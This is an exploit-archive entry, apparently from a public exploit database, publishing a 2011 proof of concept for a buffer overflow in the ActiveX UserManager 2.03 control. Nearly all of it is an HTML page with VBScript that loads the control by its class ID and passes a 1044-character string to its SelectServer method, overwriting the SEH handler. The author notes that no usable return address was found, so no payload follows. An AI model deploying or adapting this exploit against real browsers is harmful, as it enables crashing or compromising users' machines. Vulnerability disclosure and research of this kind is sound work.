[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ActiveX UserManager 2.03 Buffer Overflow
# Published : 2011-01-16
# Author : Blake
# Previous Title : Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC
# Next Title : Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode DoS Exploit
<html>
<object classid='clsid:E5D2CE27-5FA0-11D2-A666-204C4F4F5020' id='target'></object>
<script language='vbscript'>
' Exploit Title: ActiveX UserManager 2.03 Buffer Overflow
' Date: January 16, 2011
' Author: Blake
' Software Link: http://www.brothersoft.com/activex-usermanager-14519.html
' Version: 2.03
' Tested on: Windows XP SP3 / IE7 in VirtualBox
' Overwrites SEH with 00410041 but I could not find a useable pop pop ret
arg1=String(1044, "A")
arg2=True
exploit = arg1
target.SelectServer exploit ,arg2
</script>